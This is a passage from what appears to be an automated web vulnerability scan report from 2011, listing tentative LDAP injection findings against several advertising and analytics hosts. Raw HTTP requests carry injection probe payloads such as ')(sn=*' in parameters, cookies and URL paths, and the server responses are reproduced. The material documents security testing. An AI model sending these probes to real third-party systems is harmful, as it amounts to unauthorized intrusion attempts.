Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=1d130a381bb27744)!(sn=*&PRAd=253732016&AR_C=207615354 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=43&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 15:38:16 2011&prad=242390407&arc=206438258&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 10 May 2011 13:42:08 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_1d130a381bb27744&#41;!&#40;sn=exp=1&initExp=Tue May 10 13:42:08 2011&recExp=Tue May 10 13:42:08 2011&prad=253732016&arc=207615354&; expires=Mon 08-Aug-2011 13:42:08 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305034928; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

2.3. http://data.cmcore.com/imp [ci parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://data.cmcore.com
Path:   /imp

Issue detail

The ci parameter appears to be vulnerable to LDAP injection attacks.

The payloads 150267e1551cb568)(sn=* and 150267e1551cb568)!(sn=* were each submitted in the ci parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /imp?tid=17&ci=150267e1551cb568)(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=728x90&cm_mmca2=728x90_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=22K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 1

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:53:26 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 150267e1551cb568)(sn=*_login=13050356060184616714150267e1551cb568)(sn=*; path=/
Set-Cookie: 150267e1551cb568)(sn=*_reset=1305035606;path=/
Expires: Mon, 09 May 2011 19:53:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

Request 2

GET /imp?tid=17&ci=150267e1551cb568)!(sn=*&vn1=4.1.1&vn2=e4.0&ec=UTF-8&cm_mmc=IM_Display-_-x-_-x15off-_-postvday&cm_mmca1=728x90&cm_mmca2=728x90_8F_Interim_finalgif&cm_mmca3=postvday&cm_mmca4=22K&cvdone=s HTTP/1.1
Host: data.cmcore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=70091303843240316067555; TestSess3=x

Response 2

HTTP/1.1 200 OK
Date: Tue, 10 May 2011 13:53:26 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: 150267e1551cb568)!(sn=*_login=13050356060184616714150267e1551cb568)!(sn=*; path=/
Set-Cookie: 150267e1551cb568)!(sn=*_reset=1305035606;path=/
Expires: Mon, 09 May 2011 19:53:26 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, pre-check=0, post-check=0, private
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,........@..D..;

2.4. http://map.media6degrees.com/orbserv/hbjs [vstcnt cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbjs

Issue detail

The vstcnt cookie appears to be vulnerable to LDAP injection attacks.

The payloads d2e0578dab0d062e)(sn=* and d2e0578dab0d062e)!(sn=* were each submitted in the vstcnt cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=43c0pahlkze3o000000023m02157rlklhm40000000f3m03144qlkze3o000000023m02157olkxlm50000000a3m0313y7lkze3o000000023m0215sklkkpqq0000000n3m030hsnlkze3o000000023m0212nslkxrxz000000043m030x1blkkpqq0000000n3m030hsplkkpqq0000000n3m0312gdlkkyy00000000j3m030morlkkxrb0000000k3m0314k6lkxlm50000000a3m030w35lkze3o000000023m0213pylkze3o000000023m0214rwlkxlm50000000a3m0314khlkxlm50000000a3m031196lkkkbe0000000t3m0313x4lkxrxz000000043m031195lkkpqh0000000o3m031194lkkjj40000000u3m030dlxlkb5u20000000y3m0316nulkxlm50000000a3m031193lkkplo0000000q3m030p46lkkpqq0000000n3m031192lkkpke0000000s3m03008slklhm40000000f3m0316oilkxlm50000000a3m030moylkl0r50000000g3m03144elkze3o000000023m0212ftlkxrxz000000043m0310poljyxb4000000153m030e6llkl0r50000000g3m03138olkxrxz000000043m0316dnlkze3o000000023m02167ulkxq41000000053m0314qllkxlm50000000a3m03159olk8fax000000103m0315halkxlm50000000a3m030m0ulkl0r50000000g3m030m0plkkxrb0000000k3m0316e6lkxnbq000000093m0314xnlkxlm50000000a3m03167blkl0r50000000g3m0316dxlkze3o000000023m021391lkxrxz000000043m031672lkkxrb0000000k3m030ycrlkncow0000000e3m03158mlkze3o000000023m020okclkze3o000000023m0213lelkxrxz000000043m0313yolkze3o000000023m02137rlkkpqq0000000n3m030ojulkze3o000000023m021240lkxrxz000000043m0314ozlkxlm50000000a3m0314bmlkxrxz000000043m0314j7lkxlm50000000a3m0314bzlkxlm50000000a3m030ni1lkb5u20000000y3m0311pjlkxrxz000000043m030p01lkze3o000000023m0215holkxlm50000000a3m030m7alkkxrb0000000k3m0313mklkxrxz000000043m030m7flkkyyl0000000i3m03101ulkze3o000000023m020zoklkze3o000000023m0212zglkxrxz000000043m0313lxlkxrxz000000043m030zp4lkze3o000000023m02148ilkxlm50000000a3m030xvclkze3o000000023m0212yxlkxrxz000000043m0315iglkxq0l000000063m0316s2lkxpyu000000073m0314hplkxlm50000000a3m030znmlk3462000000133m0314hclkxlm50000000a3m030wd7lkze3o000000023m02102plkxrxz000000043m0310tylkkpku0000000r3m030p1blkb5u20000000y3m030p1alkze3o000000023m0200bvlk9pe80000000z3m0315xylk60qe000000123m0310lxlkxrxz000000043m03103blkxrxz000000043m0310telkd7nq0000000x3m0316rslkxppm000000083m030c9slk9pe80000000z3m0313mxlkze3o000000023m0212emlkze3o000000023m0210rdlkdkly0000000v3m03126qlkxrxz000000043m030mj2lkkxrb0000000k3m030kualkkpqq0000000n3m03163plkxlm50000000a3m030z9xlkze3o000000023m020m45lkl0r50000000g3m030m40lkkxrb0000000k3m030zqylkxrxz000000043m030mjelkkxrb0000000k3m0312qnlkkplt0000000p3m030ovslkze3o000000023m0212x6lkxrxz000000043m030bo8lkb5u20000000y3m0314e9lkze3o000000023m020mjjlkl0r50000000g3m030lw5lkb5u20000000y3m0316aulkze3o000000023m0215k9lkxlm50000000a3m0316atlkxlm50000000a3m031203lkb5u20000000y3m03163clkxlm50000000a3m031204lkkyy00000000j3m030afqlkze3o000000023m020o0vlkkpqx0000000m3m030z2ilkkxrb0000000k3m0313ovlkxrxz000000043m03; sglst=2280sbpelkxlm50000000a3m030k0a50adsnlkxlm5006bu00a3m030k0a50aarllkxlm5006bu00a3m030k0a50acg5lkxlm5006bu00a3m030k0a50a9rslkkpke0d2dl00s3m030k0b50sam5lkkxr8002zw00l3m030k0b50lcd4lkxlm5006bu00a3m030k0a50acrglkxlm5006bu00a3m030k0a50acnolkxlm5006bu00a3m030k0a50aabelkxlm5006bu00a3m030k0a50add8lkxlm5006bu00a3m030k0a50acy2lkxlm5006bu00a3m030k0a50aaoplkb5u209jqc0063e000j00500cnxlkxlm50000000a3m030k0a50abq3lkxlm5006bu00a3m030k0a50abvplkxlm5006bu00a3m030k0a50aaoilkxlm5006bu00a3m030k0a50a942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5006bu00a3m030k0a50abvclkxlm5006bu00a3m030k0a50ac5flkxlm5006bu00a3m030k0a50a56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00a3m030k0a50aawklkxlm5006bu00a3m030k0a50aasulkb5u209jqc0063e000j00500crplkxlm5006bu00a3m030k0a50aasqlkxlm5006bu00a3m030k0a50ac5rlkov6e0000000d3m030k0b50daw8lkxlm5006bu00a3m030k0a50ac60lkxlm5006bu00a3m030k0a50adc4lkxlm5006bu00a3m030k0a50ad26lkxlm5006bu00a3m030k0a50adnjlkxlm5006bu00a3m030k0a50abrilkxlm5006bu00a3m030k0a50acbclkxlm5006bu00a3m030k0a50ac85lkxlm5006bu00a3m030k0a50acsslkxlm5006bu00a3m030k0a50ac80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g700x3m030k0b50uc1elkxlm5006bu00a3m030k0a50ac81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00a3m030k0a50ac8flkxlm5006bu00a3m030k0a50aa6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00a3m030k0a50a9z6lkxlm50000000a3m030k0a50adbtlkxlm5006bu00a3m030k0a50adyllkxlm5006bu00a3m030k0a50a0kllklhm40c4010053l000k005009q4lkxlm5006bu00a3m030k0a50a9q5lkb5u20mfs300o3l000k00500b3zlkxlm5006bu00a3m030k0a50a0t7ljyxb410gst0153m030k0b50udgflkkpke0d2dl00s3m030k0b50s9mjlkxlm50000000a3m030k0a50abo0lkb5u20mm3x00y3m030k0b50ubo1lkkyy00cmo50093l000k005009pglkxlm5006bu00a3m030k0a50acwalkxlm5006bu00a3m030k0a50ad86lklhm40c4010053l000k00500d84lkxlm5006bu00a3m030k0a50adqllkxlm5006bu00a3m030k0a50adz3lkxlm5006bu00a3m030k0a50acm6lkxlm5006bu00a3m030k0a50acxdlkxlm5006bu00a3m030k0a50a719lkb5u20mm3x00g3m030k0a50b71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00a3m030k0a50acc3lkxlm5006bu00a3m030k0a50adgilkb5u209jqc0063e000j00500cthlkxlm5006bu00a3m030k0a50a4wclkb5u20mm3x00g3m030k0a50b8eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5006bu00a3m030k0a50aarilkxlm50000000a3m030k0a50abwjlkkyy00cszz00j3m030k0b50jcbplkxlm5006bu00a3m030k0a50a9gelkxlm5006bu00a3m030k0a50a; vstcnt=d2e0578dab0d062e)(sn=*

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:15 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tke0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:15 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=43m157rlklhm40000000g3m040pahlkze3o000000033m03157olkxlm50000000b3m04144qlkze3o000000033m0313y7lkze3o000000033m030hsnlkze3o000000033m0315sklkkpqq0000000o3m040x1blkkpqq0000000o3m0412nslkxrxz000000053m040hsplkkpqq0000000o3m0412gdlkkyy00000000k3m040morlkkxrb0000000l3m0414k6lkxlm50000000b3m040w35lkze3o000000033m0313pylkze3o000000033m0314rwlkxlm50000000b3m041628lkzf63000000013m0114khlkxlm50000000b3m041196lkkkbe0000000u3m0413x4lkxrxz000000053m0413qmlkzf63000000013m011195lkkpqh0000000p3m041194lkkjj40000000v3m040dlxlkb5u20000000z3m0416nulkxlm50000000b3m0413q8lkzf63000000013m011193lkkplo0000000r3m04008slklhm40000000g3m041192lkkpke0000000t3m040p46lkkpqq0000000o3m040zg4lkzf63000000013m010moylkl0r50000000h3m0416oilkxlm50000000b3m04144elkze3o000000033m0310poljyxb4000000163m0412ftlkxrxz000000053m040e6llkl0r50000000h3m0416dnlkze3o000000033m03138olkxrxz000000053m04167ulkxq41000000063m04159olk8fax000000113m0414qllkxlm50000000b3m0415halkxlm50000000b3m040m0ulkl0r50000000h3m040m0plkkxrb0000000l3m0416e6lkxnbq0000000a3m0413zblkzf63000000013m0114xnlkxlm50000000b3m04167blkl0r50000000h3m0416dxlkze3o000000033m031391lkxrxz000000053m0415zhlkzf63000000013m011672lkkxrb0000000l3m040ycrlkncow0000000f3m04158mlkze3o000000033m030okclkze3o000000033m031015lkzf63000000013m0113lelkxrxz000000053m0413yolkze3o000000033m03137rlkkpqq0000000o3m040ojulkze3o000000033m031240lkxrxz000000053m0414ozlkxlm50000000b3m0414bmlkxrxz000000053m0414j7lkxlm50000000b3m0414bzlkxlm50000000b3m040ni1lkb5u20000000z3m0411pjlkxrxz000000053m040p01
...[SNIP]...

Request 2

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=43c0pahlkze3o000000023m02157rlklhm40000000f3m03144qlkze3o000000023m02157olkxlm50000000a3m0313y7lkze3o000000023m0215sklkkpqq0000000n3m030hsnlkze3o000000023m0212nslkxrxz000000043m030x1blkkpqq0000000n3m030hsplkkpqq0000000n3m0312gdlkkyy00000000j3m030morlkkxrb0000000k3m0314k6lkxlm50000000a3m030w35lkze3o000000023m0213pylkze3o000000023m0214rwlkxlm50000000a3m0314khlkxlm50000000a3m031196lkkkbe0000000t3m0313x4lkxrxz000000043m031195lkkpqh0000000o3m031194lkkjj40000000u3m030dlxlkb5u20000000y3m0316nulkxlm50000000a3m031193lkkplo0000000q3m030p46lkkpqq0000000n3m031192lkkpke0000000s3m03008slklhm40000000f3m0316oilkxlm50000000a3m030moylkl0r50000000g3m03144elkze3o000000023m0212ftlkxrxz000000043m0310poljyxb4000000153m030e6llkl0r50000000g3m03138olkxrxz000000043m0316dnlkze3o000000023m02167ulkxq41000000053m0314qllkxlm50000000a3m03159olk8fax000000103m0315halkxlm50000000a3m030m0ulkl0r50000000g3m030m0plkkxrb0000000k3m0316e6lkxnbq000000093m0314xnlkxlm50000000a3m03167blkl0r50000000g3m0316dxlkze3o000000023m021391lkxrxz000000043m031672lkkxrb0000000k3m030ycrlkncow0000000e3m03158mlkze3o000000023m020okclkze3o000000023m0213lelkxrxz000000043m0313yolkze3o000000023m02137rlkkpqq0000000n3m030ojulkze3o000000023m021240lkxrxz000000043m0314ozlkxlm50000000a3m0314bmlkxrxz000000043m0314j7lkxlm50000000a3m0314bzlkxlm50000000a3m030ni1lkb5u20000000y3m0311pjlkxrxz000000043m030p01lkze3o000000023m0215holkxlm50000000a3m030m7alkkxrb0000000k3m0313mklkxrxz000000043m030m7flkkyyl0000000i3m03101ulkze3o000000023m020zoklkze3o000000023m0212zglkxrxz000000043m0313lxlkxrxz000000043m030zp4lkze3o000000023m02148ilkxlm50000000a3m030xvclkze3o000000023m0212yxlkxrxz000000043m0315iglkxq0l000000063m0316s2lkxpyu000000073m0314hplkxlm50000000a3m030znmlk3462000000133m0314hclkxlm50000000a3m030wd7lkze3o000000023m02102plkxrxz000000043m0310tylkkpku0000000r3m030p1blkb5u20000000y3m030p1alkze3o000000023m0200bvlk9pe80000000z3m0315xylk60qe000000123m0310lxlkxrxz000000043m03103blkxrxz000000043m0310telkd7nq0000000x3m0316rslkxppm000000083m030c9slk9pe80000000z3m0313mxlkze3o000000023m0212emlkze3o000000023m0210rdlkdkly0000000v3m03126qlkxrxz000000043m030mj2lkkxrb0000000k3m030kualkkpqq0000000n3m03163plkxlm50000000a3m030z9xlkze3o000000023m020m45lkl0r50000000g3m030m40lkkxrb0000000k3m030zqylkxrxz000000043m030mjelkkxrb0000000k3m0312qnlkkplt0000000p3m030ovslkze3o000000023m0212x6lkxrxz000000043m030bo8lkb5u20000000y3m0314e9lkze3o000000023m020mjjlkl0r50000000g3m030lw5lkb5u20000000y3m0316aulkze3o000000023m0215k9lkxlm50000000a3m0316atlkxlm50000000a3m031203lkb5u20000000y3m03163clkxlm50000000a3m031204lkkyy00000000j3m030afqlkze3o000000023m020o0vlkkpqx0000000m3m030z2ilkkxrb0000000k3m0313ovlkxrxz000000043m03; sglst=2280sbpelkxlm50000000a3m030k0a50adsnlkxlm5006bu00a3m030k0a50aarllkxlm5006bu00a3m030k0a50acg5lkxlm5006bu00a3m030k0a50a9rslkkpke0d2dl00s3m030k0b50sam5lkkxr8002zw00l3m030k0b50lcd4lkxlm5006bu00a3m030k0a50acrglkxlm5006bu00a3m030k0a50acnolkxlm5006bu00a3m030k0a50aabelkxlm5006bu00a3m030k0a50add8lkxlm5006bu00a3m030k0a50acy2lkxlm5006bu00a3m030k0a50aaoplkb5u209jqc0063e000j00500cnxlkxlm50000000a3m030k0a50abq3lkxlm5006bu00a3m030k0a50abvplkxlm5006bu00a3m030k0a50aaoilkxlm5006bu00a3m030k0a50a942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5006bu00a3m030k0a50abvclkxlm5006bu00a3m030k0a50ac5flkxlm5006bu00a3m030k0a50a56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00a3m030k0a50aawklkxlm5006bu00a3m030k0a50aasulkb5u209jqc0063e000j00500crplkxlm5006bu00a3m030k0a50aasqlkxlm5006bu00a3m030k0a50ac5rlkov6e0000000d3m030k0b50daw8lkxlm5006bu00a3m030k0a50ac60lkxlm5006bu00a3m030k0a50adc4lkxlm5006bu00a3m030k0a50ad26lkxlm5006bu00a3m030k0a50adnjlkxlm5006bu00a3m030k0a50abrilkxlm5006bu00a3m030k0a50acbclkxlm5006bu00a3m030k0a50ac85lkxlm5006bu00a3m030k0a50acsslkxlm5006bu00a3m030k0a50ac80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g700x3m030k0b50uc1elkxlm5006bu00a3m030k0a50ac81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00a3m030k0a50ac8flkxlm5006bu00a3m030k0a50aa6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00a3m030k0a50a9z6lkxlm50000000a3m030k0a50adbtlkxlm5006bu00a3m030k0a50adyllkxlm5006bu00a3m030k0a50a0kllklhm40c4010053l000k005009q4lkxlm5006bu00a3m030k0a50a9q5lkb5u20mfs300o3l000k00500b3zlkxlm5006bu00a3m030k0a50a0t7ljyxb410gst0153m030k0b50udgflkkpke0d2dl00s3m030k0b50s9mjlkxlm50000000a3m030k0a50abo0lkb5u20mm3x00y3m030k0b50ubo1lkkyy00cmo50093l000k005009pglkxlm5006bu00a3m030k0a50acwalkxlm5006bu00a3m030k0a50ad86lklhm40c4010053l000k00500d84lkxlm5006bu00a3m030k0a50adqllkxlm5006bu00a3m030k0a50adz3lkxlm5006bu00a3m030k0a50acm6lkxlm5006bu00a3m030k0a50acxdlkxlm5006bu00a3m030k0a50a719lkb5u20mm3x00g3m030k0a50b71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00a3m030k0a50acc3lkxlm5006bu00a3m030k0a50adgilkb5u209jqc0063e000j00500cthlkxlm5006bu00a3m030k0a50a4wclkb5u20mm3x00g3m030k0a50b8eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5006bu00a3m030k0a50aarilkxlm50000000a3m030k0a50abwjlkkyy00cszz00j3m030k0b50jcbplkxlm5006bu00a3m030k0a50a9gelkxlm5006bu00a3m030k0a50a; vstcnt=d2e0578dab0d062e)!(sn=*

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:16 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tkf0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:37:16 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=43m157rlklhm40000000g3m040pahlkze3o000000033m03157olkxlm50000000b3m04144qlkze3o000000033m0313y7lkze3o000000033m030hsnlkze3o000000033m0315sklkkpqq0000000o3m040x1blkkpqq0000000o3m0412nslkxrxz000000053m040hsplkkpqq0000000o3m0412gdlkkyy00000000k3m040morlkkxrb0000000l3m0414k6lkxlm50000000b3m040w35lkze3o000000033m0313pylkze3o000000033m0314rwlkxlm50000000b3m041628lkzf64000000013m0114khlkxlm50000000b3m041196lkkkbe0000000u3m0413x4lkxrxz000000053m0413qmlkzf64000000013m011195lkkpqh0000000p3m041194lkkjj40000000v3m040dlxlkb5u20000000z3m0416nulkxlm50000000b3m0413q8lkzf64000000013m011193lkkplo0000000r3m04008slklhm40000000g3m041192lkkpke0000000t3m040p46lkkpqq0000000o3m040zg4lkzf64000000013m010moylkl0r50000000h3m0416oilkxlm50000000b3m04144elkze3o000000033m0310poljyxb4000000163m0412ftlkxrxz000000053m040e6llkl0r50000000h3m0416dnlkze3o000000033m03138olkxrxz000000053m04167ulkxq41000000063m04159olk8fax000000113m0414qllkxlm50000000b3m0415halkxlm50000000b3m040m0ulkl0r50000000h3m040m0plkkxrb0000000l3m0416e6lkxnbq0000000a3m0413zblkzf64000000013m0114xnlkxlm50000000b3m04167blkl0r50000000h3m0416dxlkze3o000000033m031391lkxrxz000000053m0415zhlkzf64000000013m011672lkkxrb0000000l3m040ycrlkncow0000000f3m04158mlkze3o000000033m030okclkze3o000000033m031015lkzf64000000013m0113lelkxrxz000000053m0413yolkze3o000000033m03137rlkkpqq0000000o3m040ojulkze3o000000033m031240lkxrxz000000053m0414ozlkxlm50000000b3m0414bmlkxrxz000000053m0414j7lkxlm50000000b3m0414bzlkxlm50000000b3m040ni1lkb5u20000000z3m0411pjlkxrxz000000053m040p01
...[SNIP]...

2.5. http://metrics.philly.com/b/ss/phillycom/1/H.17/s67586282941047 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.philly.com
Path:   /b/ss/phillycom/1/H.17/s67586282941047

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads 53d4c597f94350b7)(sn=* and 53d4c597f94350b7)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /53d4c597f94350b7)(sn=*/ss/phillycom/1/H.17/s67586282941047?AQB=1&ndh=1&t=10/4/2011%208%3A11%3A30%202%20300&vmt=498F4D30&ns=phillycom&pageName=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&g=http%3A//www.philly.com/philly/news/nation_world/121548659.html&cc=USD&ch=news&server=www.philly.com&events=event1%2Cevent4&c1=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&h1=philly%2Cnews%2Cnation_world%2Cindex&v2=article%3A%20news%3A%20Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win%20-%2005/10/2011&h2=philly%2Cphilly%2Cnews%2Cnation_world%2Cindex&c3=Article&v3=news&c4=Inquirer%20Unknown&v4=philly%2Cnews%2Cnation_world%2Cindex&c5=philly%2Cnews%2Cnation_world%2Cindex&v6=First%20Visit&c8=Tuesday&c9=9%3A00AM&c10=Weekday&c11=121548659&v11=www.philly.com&c12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v12=Santorum%20goes%20to%20dinner%20and%20comes%20up%20with%20a%20win&v13=a&v15=121548659&v16=Article&v17=http%3A//www.philly.com/philly/news/nation_world/121548659.html&v18=logged%20out&c21=First%20Visit&v21=Tuesday&c22=www.philly.c